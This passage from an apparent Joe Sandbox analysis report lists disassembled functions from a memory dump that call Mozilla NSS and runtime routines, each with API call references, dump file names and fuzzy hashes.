Opcode Fuzzy Hash: 49dd0898e987e4a825f48e12946c9ed22966ea52047a14c81e5999c154b12ce9
Instruction Fuzzy Hash: 9A31E133610512EEDB141F34DD04396B7B5AB0531AF14063CE8A9D3B80EB31A8DACF81

Function 6CAF2880 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

NSS_CMSEncoder_Finish.NSS3(?), ref: 6CAF2896
NSS_CMSEncoder_Finish.NSS3(?), ref: 6CAF2932
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CAF294C
free.MOZGLUE(?), ref: 6CAF2955

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Encoder_Finish$Arena_FreeUtilfree
String ID:
API String ID: 508480814-0
Opcode ID: 638b5e6c00876fd51f3a0f3a2b89f6301ebbf02167e9e298acf95bef4cb06b37
Instruction ID: 512a959d76dd0154e1365c385a2f2f3e7d3e46f47d4aaf77f0092a3b752b2a05
Opcode Fuzzy Hash: 638b5e6c00876fd51f3a0f3a2b89f6301ebbf02167e9e298acf95bef4cb06b37
Instruction Fuzzy Hash: 8521F7B56006409BE7208F26DD4DF4777E5AF84358F094638F46987B61FB31E4898791

Function 6CB4AAA2 Relevance: 6.1, APIs: 4, Instructions: 85COMMON

Download Yara Rule

APIs

_initialize_onexit_table.API-MS-WIN-CRT-RUNTIME-L1-1-0(6CBE0D9C,00000000), ref: 6CB4AAD4
_initialize_onexit_table.API-MS-WIN-CRT-RUNTIME-L1-1-0(6CBE0DA8,00000000), ref: 6CB4AAE3

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: _initialize_onexit_table
String ID:
API String ID: 2450287516-0
Opcode ID: 25f84e3996da26e5da611ddaee7db285e15a351979a8f5acd1edd7bcbc4e45b7
Instruction ID: 01389317a546531b168d00dbec1e1bc77e9db3b13f95ff18f958d8e0f4bcd40d
Opcode Fuzzy Hash: 25f84e3996da26e5da611ddaee7db285e15a351979a8f5acd1edd7bcbc4e45b7
Instruction Fuzzy Hash: E52128319086D4ABCF01DFA899006CE77BADF06758F00C025FD24EBA84DB71A900EF92

Function 6CB2A8F0 Relevance: 6.1, APIs: 4, Instructions: 81COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,6CB12AE9,00000000,0000065C), ref: 6CB2A91D

Part of subcall function 6CACADC0: TlsGetValue.KERNEL32(?,6CAACDBB,?,6CAAD079,00000000,00000001), ref: 6CACAE10
Part of subcall function 6CACADC0: EnterCriticalSection.KERNEL32(?,?,6CAACDBB,?,6CAAD079,00000000,00000001), ref: 6CACAE24
Part of subcall function 6CACADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6CAAD079,00000000,00000001), ref: 6CACAE5A
Part of subcall function 6CACADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CAACDBB,?,6CAAD079,00000000,00000001), ref: 6CACAE6F
Part of subcall function 6CACADC0: free.MOZGLUE(85145F8B,?,?,?,?,6CAACDBB,?,6CAAD079,00000000,00000001), ref: 6CACAE7F
Part of subcall function 6CACADC0: TlsGetValue.KERNEL32(?,6CAACDBB,?,6CAAD079,00000000,00000001), ref: 6CACAEB1
Part of subcall function 6CACADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CAACDBB,?,6CAAD079,00000000,00000001), ref: 6CACAEC9

PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,6CB12AE9,00000000,0000065C), ref: 6CB2A934
SECITEM_ZfreeItem_Util.NSS3(00068C9A,00000000,00000000,00000000,?,?,6CB12AE9,00000000,0000065C), ref: 6CB2A949
free.MOZGLUE(00068C86,00000000,0000065C), ref: 6CB2A952

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID:
API String ID: 1595327144-0
Opcode ID: 19474b622faba123d5a8b5ac29dd91498c9f0e6781cdbc7f57bff980b83e047f
Instruction ID: 5e8ec6dec397a36c1d95bb6670d58ca2229e197932b7cf613ccd86d4067440b4
Opcode Fuzzy Hash: 19474b622faba123d5a8b5ac29dd91498c9f0e6781cdbc7f57bff980b83e047f
Instruction Fuzzy Hash: EA3139B46012119FD704CF19D990E62B7E9FF4C318B1582A9E80D8B756E734EC04CFA2

Function 6CAC4FB0 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6CACB60F,00000000), ref: 6CAC5003
EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6CACB60F,00000000), ref: 6CAC501C
PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6CACB60F,00000000), ref: 6CAC504B
free.MOZGLUE(?,00000000,00000000,00000000,?,6CACB60F,00000000), ref: 6CAC5064

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValuefree
String ID:
API String ID: 1112172411-0
Opcode ID: a579d831d59858b1937903035028e10b105448f30e251f9a8919c34ea9d26a72
Instruction ID: 8e3096687e323075530315c43771befe5605dbcb99bcb0b27cb9c151a30ebbf3
Opcode Fuzzy Hash: a579d831d59858b1937903035028e10b105448f30e251f9a8919c34ea9d26a72
Instruction Fuzzy Hash: E43119B4A05A06CFDB00EF68D48466ABBF4FF09344F158569E859DB701EB30E994CBD2

Function 6CAAABF0 Relevance: 6.1, APIs: 4, Instructions: 74stringCOMMON

Download Yara Rule

APIs

CERT_GetFirstEmailAddress.NSS3(?), ref: 6CAAAC0B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CAAAC26
PR_Now.NSS3 ref: 6CAAAC34
CERT_GetNextEmailAddress.NSS3(?,00000000), ref: 6CAAAC6E

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: AddressEmail$FirstNextstrcmp
String ID:
API String ID: 3008928262-0
Opcode ID: 63d7298138bc4960ba8f90f24c484d18b98b2b8fb252b1df95bb1a58803b9d53
Instruction ID: d2c48f4a973bf2f937b45776fa82bbe868a0b488fff62b619f90e9b5d909492a
Opcode Fuzzy Hash: 63d7298138bc4960ba8f90f24c484d18b98b2b8fb252b1df95bb1a58803b9d53
Instruction Fuzzy Hash: D011D671A026456FB7009EE99D819AF77E9EF45658B040438FD18C7701FB30DC59CAE2

Function 6CAF2DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6CAF2E08

Part of subcall function 6CAE14C0: TlsGetValue.KERNEL32 ref: 6CAE14E0
Part of subcall function 6CAE14C0: EnterCriticalSection.KERNEL32 ref: 6CAE14F5
Part of subcall function 6CAE14C0: PR_Unlock.NSS3 ref: 6CAE150D

PORT_NewArena_Util.NSS3(00000400), ref: 6CAF2E1C
PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6CAF2E3B
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CAF2E95

Part of subcall function 6CAE1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CA888A4,00000000,00000000), ref: 6CAE1228
Part of subcall function 6CAE1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6CAE1238
Part of subcall function 6CAE1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6CA888A4,00000000,00000000), ref: 6CAE124B
Part of subcall function 6CAE1200: PR_CallOnce.NSS3(6CBE2AA4,6CAE12D0,00000000,00000000,00000000,?,6CA888A4,00000000,00000000), ref: 6CAE125D
Part of subcall function 6CAE1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6CAE126F
Part of subcall function 6CAE1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6CAE1280
Part of subcall function 6CAE1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6CAE128E
Part of subcall function 6CAE1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6CAE129A
Part of subcall function 6CAE1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6CAE12A1

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
String ID:
API String ID: 1441289343-0
Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction ID: 490d0f520877131795be7141e56afc83d569fcfbd38f1bd030072afeb7aba63a
Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction Fuzzy Hash: 2921F2B1D003914BE700CF549D44BAA3A74AF9530CF250369ED285B742F7B1E6D982A2

Function 6CA704D0 Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?), ref: 6CA704F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CA7053B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CA70558
GetLastError.KERNEL32 ref: 6CA7057A

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorFileHandleInformationLast
String ID:
API String ID: 3051374878-0
Opcode ID: a72155b71e1212ab8ed09d8b3cd45a3987f62642e2c3d12e9c43c22ad457cb38
Instruction ID: 0f4da32cc7ff83035aef4ba52a64a88332d0f903975e39b57cc41071bd7aa892
Opcode Fuzzy Hash: a72155b71e1212ab8ed09d8b3cd45a3987f62642e2c3d12e9c43c22ad457cb38
Instruction Fuzzy Hash: F6215E71A002189FDB08DF68DC94AAEB7B8FF48308B148129E809DB351D731ED05CBA0

Function 6CA869B0 Relevance: 6.1, APIs: 4, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(6CA86AB7,0000000C,00000001,00000000,?,?,6CA86AB7,?,00000000,?), ref: 6CA869CE

Part of subcall function 6CAE10C0: TlsGetValue.KERNEL32(?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE10F3
Part of subcall function 6CAE10C0: EnterCriticalSection.KERNEL32(?,?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE110C
Part of subcall function 6CAE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE1141
Part of subcall function 6CAE10C0: PR_Unlock.NSS3(?,?,?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE1182
Part of subcall function 6CAE10C0: TlsGetValue.KERNEL32(?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE119C

SEC_ASN1EncodeItem_Util.NSS3(6CA86AB7,0000001C,00000004,?,00000001,00000000), ref: 6CA86A06
SEC_ASN1EncodeItem_Util.NSS3(6CA86AB7,?,00000000,?,00000001,00000000,?,?,6CA86AB7,?,00000000,?), ref: 6CA86A2D
PR_SetError.NSS3(FFFFE005,00000000,00000001,00000000,?,?,6CA86AB7,?,00000000,?), ref: 6CA86A42

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$ArenaEncodeItem_Value$Alloc_AllocateCriticalEnterErrorSectionUnlock
String ID:
API String ID: 4031546487-0
Opcode ID: 8b1c1e6824e8ca0b05af1cb3075751dafa34651e100201eccc2f1d22ed2313e5
Instruction ID: 7273197d94483e89ab53d9f902c67251429e15c6fef1ddad477e539041183674
Opcode Fuzzy Hash: 8b1c1e6824e8ca0b05af1cb3075751dafa34651e100201eccc2f1d22ed2313e5
Instruction Fuzzy Hash: 7111B271A522096FF710DE65DC80B56B3BCEB0425CF188529EA19C3F41F735E4858790

Function 6CAAACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6CAAACC2

Part of subcall function 6CA82F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CA82F0A
Part of subcall function 6CA82F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CA82F1D

Part of subcall function 6CA82AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6CA80A1B,00000000), ref: 6CA82AF0
Part of subcall function 6CA82AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA82B11

CERT_DestroyCertList.NSS3(00000000), ref: 6CAAAD5E

Part of subcall function 6CAC57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CA8B41E,00000000,00000000,?,00000000,?,6CA8B41E,00000000,00000000,00000001,?), ref: 6CAC57E0
Part of subcall function 6CAC57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CAC5843

CERT_DestroyCertList.NSS3(?), ref: 6CAAAD36

Part of subcall function 6CA82F50: CERT_DestroyCertificate.NSS3(?), ref: 6CA82F65
Part of subcall function 6CA82F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CA82F83

free.MOZGLUE(?), ref: 6CAAAD4F

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID:
API String ID: 132756963-0
Opcode ID: 611f1c83ff4812d4acfe6706665cc473eb32d8ca0adda2aead548f07fce50a87
Instruction ID: 14a92f887616e0b60131c8d515072b01826f40e7dd8c258130c8352430e84ce4
Opcode Fuzzy Hash: 611f1c83ff4812d4acfe6706665cc473eb32d8ca0adda2aead548f07fce50a87
Instruction Fuzzy Hash: BB2196B1D012148BEB10DFA4DA055EEB7F5AF05258F454168D849BB700FB31AE9ACBA2

Function 6CAC24E0 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CAC24FF
EnterCriticalSection.KERNEL32(?), ref: 6CAC250F
PR_Unlock.NSS3(?), ref: 6CAC253C
PR_SetError.NSS3(00000000,00000000), ref: 6CAC2554

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 988acf904a0c1559e04fc9fc0c210cad10450a5bd296e0ef7af5c474c6dec30f
Instruction ID: 5b0636d379c93a13361b591df877a0aac987c86a8e7216c67ee9769a1f3f4462
Opcode Fuzzy Hash: 988acf904a0c1559e04fc9fc0c210cad10450a5bd296e0ef7af5c474c6dec30f
Instruction Fuzzy Hash: EE112675E00118ABDB00AF68EC559AF7B7CEF0A328B540124EC0897301EB31E998C7E2

Function 6CADECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6CADF0AD,6CADF150,?,6CADF150,?,?,?), ref: 6CADECBA

Part of subcall function 6CAE0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CA887ED,00000800,6CA7EF74,00000000), ref: 6CAE1000
Part of subcall function 6CAE0FF0: PR_NewLock.NSS3(?,00000800,6CA7EF74,00000000), ref: 6CAE1016
Part of subcall function 6CAE0FF0: PL_InitArenaPool.NSS3(00000000,security,6CA887ED,00000008,?,00000800,6CA7EF74,00000000), ref: 6CAE102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6CADECD1

Part of subcall function 6CAE10C0: TlsGetValue.KERNEL32(?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE10F3
Part of subcall function 6CAE10C0: EnterCriticalSection.KERNEL32(?,?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE110C
Part of subcall function 6CAE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE1141
Part of subcall function 6CAE10C0: PR_Unlock.NSS3(?,?,?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE1182
Part of subcall function 6CAE10C0: TlsGetValue.KERNEL32(?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6CADED02

Part of subcall function 6CAE10C0: PL_ArenaAllocate.NSS3(?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6CADED5A

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: 183cf278a4843929f00a4614bc450f3f1f2b6914e754ddb57ec4b5936296735c
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: 6521A4B1A007425BE700CF25D944B56B7E4BFA9348F16C219E81C87662EB70E5D4C6D0

Function 6CAAC860 Relevance: 6.1, APIs: 4, Instructions: 64threadCOMMON

Download Yara Rule

APIs

PK11_IsLoggedIn.NSS3(?,?), ref: 6CAAC890

Part of subcall function 6CAA8F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6CA9DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CAA8FAF
Part of subcall function 6CAA8F70: PR_Now.NSS3(?,?,00000002,?,?,?,6CA9DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CAA8FD1
Part of subcall function 6CAA8F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6CA9DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CAA8FFA
Part of subcall function 6CAA8F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6CA9DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6CAA9013
Part of subcall function 6CAA8F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6CA9DA9B,?,00000000,?,?,?,?,CE534353), ref: 6CAA9042
Part of subcall function 6CAA8F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6CA9DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6CAA905A
Part of subcall function 6CAA8F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6CA9DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6CAA9073
Part of subcall function 6CAA8F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6CA9DA9B,?,00000000,?,?,?,?,CE534353), ref: 6CAA9111

PR_GetCurrentThread.NSS3 ref: 6CAAC8B2

Part of subcall function 6CB49BF0: TlsGetValue.KERNEL32(?,?,?,6CB90A75), ref: 6CB49C07

PK11_Authenticate.NSS3(?,00000001,?), ref: 6CAAC8D0
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CAAC8EB

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: K11_Value$CriticalEnterSectionUnlock$AuthenticateCurrentInternalItem_LoggedSlotThreadUtilZfree
String ID:
API String ID: 999015661-0
Opcode ID: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
Instruction ID: 17cd06a62509aea1d032da0c43df9ece18db43bcd7b65ba5d055ce4f13ad6237
Opcode Fuzzy Hash: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
Instruction Fuzzy Hash: 0E010C66E0121167F70525F95D84ABF35A9AF4915CF0C0135FD04A7B01F753889E93E1

Function 6CB9CB30 Relevance: 6.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 6CB49890: TlsGetValue.KERNEL32(?,?,?,6CB497EB), ref: 6CB4989E

